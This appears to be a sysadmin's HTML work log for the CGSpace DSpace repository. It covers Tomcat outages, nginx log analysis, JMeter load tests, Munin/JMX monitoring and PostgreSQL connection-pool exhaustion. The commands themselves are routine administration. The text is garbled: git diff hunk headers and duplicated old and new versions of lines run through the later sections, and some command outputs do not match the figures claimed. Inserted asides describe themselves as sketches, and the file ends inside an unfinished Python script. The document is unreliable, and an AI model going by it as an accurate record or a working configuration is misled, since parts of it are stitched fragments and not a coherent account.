<pre tabindex="0"><code>[ERROR] Failed to execute goal on project dspace-swordv2: Could not resolve dependencies for project org.dspace:dspace-swordv2:war:5.5: Failed to collect dependencies at org.swordapp:sword2-server:jar:classes:1.0 -&gt; org.apache.abdera:abdera-client:jar:1.1.1 -&gt; org.apache.abdera:abdera-core:jar:1.1.1 -&gt; org.apache.abdera:abdera-i18n:jar:1.1.1 -&gt; org.apache.geronimo.specs:geronimo-activation_1.0.2_spec:jar:1.1: Failed to read artifact descriptor for org.apache.geronimo.specs:geronimo-activation_1.0.2_spec:jar:1.1: Could not find artifact org.apache.geronimo.specs:specs:pom:1.1 in central (http://localhost:8081/artifactory/libs-release) -&gt; [Help 1]
</code></pre><ul>
<li>I never noticed because I build with that web application disabled:</li>
</ul>
<pre tabindex="0"><code>$ mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -Denv=localhost -P \!dspace-sword,\!dspace-swordv2 clean package
</code></pre><ul>
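<li>For the Artifactory proxy mentioned above, the settings.xml change is roughly a mirror entry like this (a sketch; the ID and URL are whatever was configured in Artifactory):</li>
</ul>
<pre tabindex="0"><code>&lt;mirrors&gt;
  &lt;mirror&gt;
    &lt;id&gt;artifactory&lt;/id&gt;
    &lt;name&gt;Local Artifactory cache&lt;/name&gt;
    &lt;url&gt;http://localhost:8081/artifactory/libs-release&lt;/url&gt;
    &lt;mirrorOf&gt;*&lt;/mirrorOf&gt;
  &lt;/mirror&gt;
&lt;/mirrors&gt;
</code></pre><ul>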
<li>UptimeRobot said CGSpace went down for a few minutes</li>
<li>I didn&rsquo;t do anything but it came back up on its own</li>
<li>Now Linode alert says the CPU load is high, <em>sigh</em></li>
<li>Regarding the heap space error earlier today, it looks like it does happen a few times a week or month (I&rsquo;m not sure how far these logs go back, as they are not strictly daily):</li>
</ul>
<pre tabindex="0"><code># zgrep -c java.lang.OutOfMemoryError /var/log/tomcat7/catalina.out* | grep -v :0
/var/log/tomcat7/catalina.out:2
/var/log/tomcat7/catalina.out.10.gz:7
/var/log/tomcat7/catalina.out.11.gz:1
</code></pre><ul>
<li>I don&rsquo;t see any errors in the nginx or catalina logs, so I guess UptimeRobot just got impatient and closed the request, which caused nginx to send an HTTP 499</li>
<li>I realize I never did a full re-index after the SQL author and affiliation updates last week, so I should force one now:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-discovery -b
</code></pre><ul>
<li>Maria from Bioversity asked if I could remove the abstracts from all of their Limited Access items in the <a href="https://cgspace.cgiar.org/handle/10568/35501">Bioversity Journal Articles</a> collection</li>
<li>Use this GREL in OpenRefine after isolating all the Limited Access items: <code>value.startsWith(&quot;10568/35501&quot;)</code></li>
<li>UptimeRobot said CGSpace went down AGAIN and both Sisay and Danny immediately logged in and restarted Tomcat without talking to me <em>or</em> each other!</li>
</ul>
<pre tabindex="0"><code>Jan 18 07:01:22 linode18 sudo[10805]: dhmichael : TTY=pts/5 ; PWD=/home/dhmichael ; USER=root ; COMMAND=/bin/systemctl restart tomcat7
Jan 18 07:01:22 linode18 sudo[10805]: pam_unix(sudo:session): session opened for user root by dhmichael(uid=0)
Jan 18 07:01:22 linode18 systemd[1]: Stopping LSB: Start Tomcat....
Jan 18 07:01:22 linode18 sudo[10812]: swebshet : TTY=pts/3 ; PWD=/home/swebshet ; USER=root ; COMMAND=/bin/systemctl restart tomcat7
</code></pre><ul>
<li>Linode alerted and said that the CPU load was 264.1% on CGSpace</li>
<li>Start the Discovery indexing again:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-discovery -b
</code></pre><ul>
<li>Linode alerted again and said that CGSpace was using 301% CPU</li>
<li>Peter emailed to ask why <a href="https://cgspace.cgiar.org/handle/10568/88090">this item</a> doesn&rsquo;t have an Altmetric badge on CGSpace but does have one on the <a href="https://www.altmetric.com/details/26709041">Altmetric dashboard</a></li>
<li>Looks like our badge code calls the <code>handle</code> endpoint which doesn&rsquo;t exist:</li>
</ul>
<pre tabindex="0"><code>https://api.altmetric.com/v1/handle/10568/88090
</code></pre><ul>
<li>I told Peter we should keep an eye out and try again next week</li>
</ul>
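<ul>
<li>A quick way to double check what that endpoint actually returns is to look at its HTTP status code (just a sanity check, not part of the badge code):</li>
</ul>
<pre tabindex="0"><code>$ curl -s -o /dev/null -w &#34;%{http_code}\n&#34; https://api.altmetric.com/v1/handle/10568/88090
</code></pre>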
<ul>
<li>Run the authority indexing script on CGSpace and of course it died:</li>
</ul>
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-authority
Retrieving all data
Initialize org.dspace.authority.indexer.DSpaceAuthorityIndexer
Exception: null
</code></pre><ul>
<li>In the end there were 324 items in the collection that were Limited Access, but only 199 had abstracts</li>
<li>I want to document the workflow of adding a production PostgreSQL database to a development instance of <a href="https://github.com/alanorth/docker-dspace">DSpace in Docker</a>:</li>
</ul>
<pre tabindex="0"><code>$ docker exec dspace_db dropdb -U postgres dspace
$ docker exec dspace_db createdb -U postgres -O dspace --encoding=UNICODE dspace
$ docker exec dspace_db psql -U postgres dspace -c &#39;alter user dspace createuser;&#39;
$ docker cp test.dump dspace_db:/tmp/test.dump
$ docker exec dspace_db pg_restore -U postgres -d dspace /tmp/test.dump
$ docker exec dspace_db psql -U postgres dspace -c &#39;alter user dspace nocreateuser;&#39;
$ docker exec dspace_db vacuumdb -U postgres dspace
$ docker cp ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspace_db:/tmp
$ docker exec dspace_db psql -U dspace -f /tmp/update-sequences.sql dspace
</code></pre><ul>
<li>The source code is here: <a href="https://gist.github.com/alanorth/ddd7f555f0e487fe0e9d3eb4ff26ce50">rest-find-collections.py</a></li>
<li>Peter had said that he found a bunch of ILRI collections that were called &ldquo;untitled&rdquo;, but I don&rsquo;t see any:</li>
</ul>
<pre tabindex="0"><code>$ ./rest-find-collections.py 10568/1 | wc -l
308
$ ./rest-find-collections.py 10568/1 | grep -i untitled
</code></pre><ul>
<li>Thinking about generating a jmeter test plan for DSpace, along the lines of <a href="https://github.com/Georgetown-University-Libraries/dspace-performance-test">Georgetown&rsquo;s dspace-performance-test</a></li>
<li>I got a list of all the GET requests on CGSpace for January 21st (the last time Linode complained the load was high), excluding admin calls:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -c -v &#34;/admin&#34;
56405
</code></pre><ul>
<li>Apparently about 28% of these requests were for bitstreams, 30% for the REST API, and 30% for handles:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -v &#34;/admin&#34; | awk &#39;{print $7}&#39; | grep -Eo &#34;^/(handle|bitstream|rest|oai)/&#34; | sort | uniq -c | sort -n
38 /oai/
14406 /bitstream/
15179 /rest/
</code></pre><ul>
<li>And 3% were to the homepage or search:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -v &#34;/admin&#34; | awk &#39;{print $7}&#39; | grep -Eo &#39;^/($|open-search|discover)&#39; | sort | uniq -c
1050 /
413 /discover
170 /open-search
</code></pre><ul>
<li>The last 10% or so seem to be for static assets that would be served by nginx anyways:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -v &#34;/admin&#34; | awk &#39;{print $7}&#39; | grep -v bitstream | grep -Eo &#39;\.(js|css|png|jpg|jpeg|php|svg|gif|txt|map)$&#39; | sort | uniq -c | sort -n
2 .gif
7 .css
84 .js
</code></pre>
<ul>
<li>Looking at the REST requests, most of them are to expand all or metadata, but 5% are for retrieving bitstreams:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/library-access.log.4.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/rest.log.4.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/oai.log.4.gz /var/log/nginx/error.log.3.gz /var/log/nginx/error.log.4.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -v &#34;/admin&#34; | awk &#39;{print $7}&#39; | grep -E &#34;^/rest&#34; | grep -Eo &#34;(retrieve|expand=[a-z].*)&#34; | sort | uniq -c | sort -n
1 expand=collections
16 expand=all&amp;limit=1
45 expand=items
</code></pre><ul>
<li>I finished creating the test plan for DSpace Test and ran it from my Linode with:</li>
</ul>
<pre tabindex="0"><code>$ jmeter -n -t DSpacePerfTest-dspacetest.cgiar.org.jmx -l 2018-01-24-1.jtl
</code></pre><ul>
<li>Atmire responded to <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560">my issue from two weeks ago</a> and said they will start looking into DSpace 5.8 compatibility for CGSpace</li>
<li>I set up a new Arch Linux Linode instance with 8192 MB of RAM and ran the test plan a few times to get a baseline:</li>
</ul>
<pre tabindex="0"><code># lscpu
# lscpu
Architecture: x86_64
CPU op-mode(s): 32-bit, 64-bit
</code></pre><ul>
<li>Then I generated reports for these runs like this:</li>
</ul>
<pre tabindex="0"><code>$ jmeter -g 2018-01-24-linode5451120-baseline.jtl -o 2018-01-24-linode5451120-baseline
</code></pre><h2 id="2018-01-25">2018-01-25</h2>
<ul>
<li>Run another round of tests on DSpace Test with jmeter after changing Tomcat&rsquo;s <code>minSpareThreads</code> to 20 (default is 10) and <code>acceptorThreadCount</code> to 2 (default is 1):</li>
</ul>
<pre tabindex="0"><code>$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads.log
$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads2.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads2.log
$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads3.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads3.log
</code></pre><ul>
<li>I changed the parameters back to the baseline ones and switched the Tomcat JVM garbage collector to G1GC and re-ran the tests</li>
<li>JVM options for Tomcat changed from <code>-Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC</code> to <code>-Xms3072m -Xmx3072m -XX:+UseG1GC -XX:+PerfDisableSharedMem</code></li>
</ul>
<pre tabindex="0"><code>$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-g1gc.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-g1gc.log
$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-g1gc2.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-g1gc2.log
$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-g1gc3.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-g1gc3.log
</code></pre><ul>
<li>The problem is that Peter wanted to use two questions, one for CG centers and one for other, but using the same metadata value, which isn&rsquo;t possible (?)</li>
<li>So I used some creativity and made several fields display values, but not store any, ie:</li>
</ul>
<pre tabindex="0"><code>&lt;pair&gt;
&lt;displayed-value&gt;For products published by another party:&lt;/displayed-value&gt;
&lt;stored-value&gt;&lt;/stored-value&gt;
&lt;/pair&gt;
</code></pre><ul>
<li>CGSpace went down this morning for a few minutes, according to UptimeRobot</li>
<li>Looking at the DSpace logs I see this error happened just before UptimeRobot noticed it going down:</li>
</ul>
<pre tabindex="0"><code>2018-01-29 05:30:22,226 INFO org.dspace.usage.LoggerUsageEventListener @ anonymous:session_id=3775D4125D28EF0C691B08345D905141:ip_addr=68.180.229.254:view_item:handle=10568/71890
2018-01-29 05:30:22,322 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractSearch @ org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1994+TO+1999]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
Was expecting one of:
&#34;TO&#34; ...
&lt;RANGE_QUOTED&gt; ...
&lt;RANGE_GOOP&gt; ...
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1994+TO+1999]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
Was expecting one of:
&#34;TO&#34; ...
&lt;RANGE_QUOTED&gt; ...
&lt;RANGE_GOOP&gt; ...
</code></pre><ul>
<li>I see a few dozen HTTP 499 errors in the nginx access log for a few minutes before this happened, but HTTP 499 is just when nginx says that the client closed the request early</li>
<li>Perhaps this from the nginx error log is relevant?</li>
</ul>
<pre tabindex="0"><code>2018/01/29 05:26:34 [warn] 26895#26895: *944759 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000026166 while reading upstream, client: 180.76.15.34, server: cgspace.cgiar.org, request: &#34;GET /bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12 HTTP/1.1&#34;, upstream: &#34;http://127.0.0.1:8443/bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12&#34;, host: &#34;cgspace.cgiar.org&#34;
</code></pre><ul>
<li>I think that must be unrelated, probably the client closed the request to nginx because DSpace (Tomcat) was taking too long</li>
<li>An interesting <a href="https://gist.github.com/magnetikonline/11312172">snippet to get the maximum and average nginx responses</a>:</li>
</ul>
<pre tabindex="0"><code># awk &#39;($9 ~ /200/) { i++;sum+=$10;max=$10&gt;max?$10:max; } END { printf(&#34;Maximum: %d\nAverage: %d\n&#34;,max,i?sum/i:0); }&#39; /var/log/nginx/access.log
Maximum: 2771268
Average: 210483
</code></pre><ul>
<li>My best guess is that the Solr search error is related somehow but I can&rsquo;t figure it out</li>
<li>We definitely have enough database connections, as I haven&rsquo;t seen a pool error in weeks:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-2*
dspace.log.2018-01-20:0
dspace.log.2018-01-21:0
dspace.log.2018-01-22:0
dspace.log.2018-01-29:0
</code></pre><ul>
<li>Wow, so apparently you need to specify which connector to check if you want any of the Munin Tomcat plugins besides &ldquo;tomcat_jvm&rdquo; to work (the connector name can be seen in the Catalina logs)</li>
<li>I modified <em>/etc/munin/plugin-conf.d/tomcat</em> to add the connector (with surrounding quotes!) and now the other plugins work (obviously the credentials are incorrect):</li>
</ul>
<pre tabindex="0"><code>[tomcat_*]
env.host 127.0.0.1
env.port 8081
env.connector &#34;http-bio-127.0.0.1-8443&#34;
env.user munin
env.password munin
</code></pre><ul>
<li>For example, I can see the threads:</li>
</ul>
<pre tabindex="0"><code># munin-run tomcat_threads
busy.value 0
idle.value 20
max.value 400
</code></pre><ul>
<li>Although following the logic of <em>/usr/share/munin/plugins/jmx_tomcat_dbpools</em> could be useful for getting the active Tomcat sessions</li>
<li>From debugging the <code>jmx_tomcat_db_pools</code> script from the <code>munin-plugins-java</code> package, I see that this is how you call arbitrary mbeans:</li>
</ul>
<pre tabindex="0"><code># port=5400 ip=&#34;127.0.0.1&#34; /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=DataSource,class=javax.sql.DataSource,name=* maxActive
Catalina:type=DataSource,class=javax.sql.DataSource,name=&#34;jdbc/dspace&#34; maxActive 300
</code></pre><ul>
<li>More notes here: <a href="https://github.com/munin-monitoring/contrib/tree/master/plugins/jmx">https://github.com/munin-monitoring/contrib/tree/master/plugins/jmx</a></li>
<li>Looking at the Munin graphs, I see that the load is 200% every morning from 03:00 to almost 08:00</li>
<li>Tomcat&rsquo;s catalina.out log file is full of spam from this thing too, with lines like this:</li>
</ul>
<pre tabindex="0"><code>[===================&gt; ]38% time remaining: 5 hour(s) 21 minute(s) 47 seconds. timestamp: 2018-01-29 06:25:16
</code></pre><ul>
<li>There are millions of these status lines, for example in just this one log file:</li>
</ul>
<pre tabindex="0"><code># zgrep -c &#34;time remaining&#34; /var/log/tomcat7/catalina.out.1.gz
1084741
</code></pre><ul>
<li>I filed a ticket with Atmire: <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=566">https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=566</a></li>
<li>Now PostgreSQL activity shows 308 connections!</li>
<li>Well this is interesting, there are 400 Tomcat threads busy:</li>
</ul>
<pre tabindex="0"><code># munin-run tomcat_threads
busy.value 400
idle.value 0
max.value 400
</code></pre><ul>
<li>And wow, we finally exhausted the database connections, from dspace.log:</li>
</ul>
<pre tabindex="0"><code>2018-01-31 08:05:28,964 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-451] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:300; busy:300; idle:0; lastwait:5000].
</code></pre><ul>
<li>Now even the nightly Atmire background thing is getting HTTP 500 error:</li>
</ul>
<pre tabindex="0"><code>Jan 31, 2018 8:16:05 AM com.sun.jersey.spi.container.ContainerResponse logException
SEVERE: Mapped exception to response: 500 (Internal Server Error)
javax.ws.rs.WebApplicationException
</code></pre><ul>
<li>For now I will restart Tomcat to clear this shit and bring the site back up</li>
<li>The top IPs from this morning, during 7 and 8AM in XMLUI and REST/OAI:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &#34;31/Jan/2018:(07|08)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
67 66.249.66.70
70 207.46.13.12
71 197.210.168.174
198 66.249.66.90
219 41.204.190.40
255 2405:204:a208:1e12:132:2a8e:ad28:46c0
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;31/Jan/2018:(07|08)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
2 65.55.210.187
2 66.249.66.90
3 157.55.39.79
</code></pre><ul>
<li>I should make separate database pools for the web applications and the API applications like REST and OAI (a sketch follows below)</li>
<li>Ok, so this is interesting: I figured out how to get the MBean path to query Tomcat&rsquo;s activeSessions from JMX (using <code>munin-plugins-java</code>):</li>
</ul>
<pre tabindex="0"><code># port=5400 ip=&#34;127.0.0.1&#34; /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=Manager,context=/,host=localhost activeSessions
Catalina:type=Manager,context=/,host=localhost activeSessions 8
</code></pre><ul>
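<li>For the separate web and API pools mentioned above, a rough sketch of what that might look like in Tomcat&rsquo;s server.xml (names and sizes are placeholders, not deployed anywhere yet):</li>
</ul>
<pre tabindex="0"><code>&lt;Resource name=&#34;jdbc/dspaceWeb&#34; auth=&#34;Container&#34; type=&#34;javax.sql.DataSource&#34;
          driverClassName=&#34;org.postgresql.Driver&#34;
          url=&#34;jdbc:postgresql://localhost:5432/dspace?ApplicationName=dspaceWeb&#34;
          username=&#34;dspace&#34; password=&#34;dspace&#34;
          maxActive=&#34;250&#34; maxIdle=&#34;15&#34; minIdle=&#34;5&#34; maxWait=&#34;5000&#34;
          validationQuery=&#34;SELECT 1&#34; testOnBorrow=&#34;true&#34; /&gt;
&lt;Resource name=&#34;jdbc/dspaceApi&#34; auth=&#34;Container&#34; type=&#34;javax.sql.DataSource&#34;
          driverClassName=&#34;org.postgresql.Driver&#34;
          url=&#34;jdbc:postgresql://localhost:5432/dspace?ApplicationName=dspaceApi&#34;
          username=&#34;dspace&#34; password=&#34;dspace&#34;
          maxActive=&#34;50&#34; maxIdle=&#34;5&#34; minIdle=&#34;2&#34; maxWait=&#34;5000&#34;
          validationQuery=&#34;SELECT 1&#34; testOnBorrow=&#34;true&#34; /&gt;
</code></pre><ul>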
<li>If you connect to Tomcat in <code>jvisualvm</code> it&rsquo;s pretty obvious when you hover over the elements</li>
</ul>
<h2 id="2018-02-01">2018-02-01</h2>
<ul>
<li>Yesterday I figured out how to monitor DSpace sessions using JMX</li>
<li>I copied the logic in the jmx_tomcat_dbpools provided by Ubuntu&rsquo;s munin-plugins-java package and used the stuff I discovered about JMX in 2018-01</li>
<li>Run all system updates and reboot DSpace Test</li>
<li>Wow, I packaged up the <code>jmx_dspace_sessions</code> stuff in the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a> and deployed it on CGSpace and it totally works:</li>
</ul>
<pre tabindex="0"><code># munin-run jmx_dspace_sessions
v_.value 223
v_jspui.value 1
v_oai.value 0
</code></pre><ul>
<li>I finally took a look at the second round of cleanups Peter had sent me for author affiliations in mid January</li>
<li>After trimming whitespace and quickly scanning for encoding errors I applied them on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./delete-metadata-values.py -i /tmp/2018-02-03-Affiliations-12-deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
$ ./fix-metadata-values.py -i /tmp/2018-02-03-Affiliations-1116-corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Then I started a full Discovery reindex:</li>
</ul>
<pre><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
real 96m39.823s
user 14m10.975s
@ -152,12 +152,12 @@ sys 2m29.088s
</code></pre><ul>
<li>Generate a new list of affiliations for Peter to sort through:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
COPY 3723
</code></pre><ul>
<li>Oh, and it looks like we processed over 3.1 million requests in January, up from 2.9 million in <a href="/cgspace-notes/2017-12/">December</a>:</li>
</ul>
<pre><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2018&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2018&#34;
3126109
real 0m23.839s
@ -167,14 +167,14 @@ sys 0m1.905s
<ul>
<li>Toying with correcting authors with trailing spaces via PostgreSQL:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value=REGEXP_REPLACE(text_value, '\s+$' , '') where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^.*?\s+$';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=REGEXP_REPLACE(text_value, &#39;\s+$&#39; , &#39;&#39;) where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^.*?\s+$&#39;;
UPDATE 20
</code></pre><ul>
<li>I tried the <code>TRIM(TRAILING from text_value)</code> function and it said it changed 20 items but the spaces didn&rsquo;t go away</li>
<li>This is on a fresh import of the CGSpace database, but when I tried to apply it on CGSpace there were no changes detected. Weird.</li>
<li>Anyways, Peter wants a new list of authors to clean up, so I exported another CSV:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors-2018-02-05.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors-2018-02-05.csv with csv;
COPY 55630
</code></pre><h2 id="2018-02-06">2018-02-06</h2>
<ul>
@ -182,9 +182,9 @@ COPY 55630
<li>I see 308 PostgreSQL connections in <code>pg_stat_activity</code></li>
<li>The usage otherwise seemed low for REST/OAI as well as XMLUI in the last hour:</li>
</ul>
<pre><code># date
<pre tabindex="0"><code># date
Tue Feb 6 09:30:32 UTC 2018
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;6/Feb/2018:(08|09)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;6/Feb/2018:(08|09)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
2 223.185.41.40
2 66.249.64.14
2 77.246.52.40
@ -195,7 +195,7 @@ Tue Feb 6 09:30:32 UTC 2018
6 154.68.16.34
7 207.46.13.66
1548 50.116.102.77
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &quot;6/Feb/2018:(08|09)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &#34;6/Feb/2018:(08|09)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
77 213.55.99.121
86 66.249.64.14
101 104.196.152.243
@ -232,8 +232,8 @@ Tue Feb 6 09:30:32 UTC 2018
<li>CGSpace crashed again, this time around <code>Wed Feb 7 11:20:28 UTC 2018</code></li>
<li>I took a few snapshots of the PostgreSQL activity at the time and as the minutes went on; the connections were very high at first but reduced on their own:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' &gt; /tmp/pg_stat_activity.txt
$ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; &gt; /tmp/pg_stat_activity.txt
$ grep -c &#39;PostgreSQL JDBC&#39; /tmp/pg_stat_activity*
/tmp/pg_stat_activity1.txt:300
/tmp/pg_stat_activity2.txt:272
/tmp/pg_stat_activity3.txt:168
@ -242,7 +242,7 @@ $ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
</code></pre><ul>
<li>Interestingly, all of those 751 connections were idle!</li>
</ul>
<pre><code>$ grep &quot;PostgreSQL JDBC&quot; /tmp/pg_stat_activity* | grep -c idle
<pre tabindex="0"><code>$ grep &#34;PostgreSQL JDBC&#34; /tmp/pg_stat_activity* | grep -c idle
751
</code></pre><ul>
<li>Since I was restarting Tomcat anyways, I decided to deploy the changes to create two different pools for web and API apps</li>
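<li>As a sanity check on the new pools, something like this rough Python sketch (not part of the original notes; it assumes local access with psycopg2 and the same placeholder credentials used elsewhere in these notes) could count connections per pool and state:</li>
</ul>
<pre tabindex="0"><code>#!/usr/bin/env python3
# Rough sketch, not from the original notes: count PostgreSQL connections
# per JDBC pool (application_name) and state. Credentials are placeholders.
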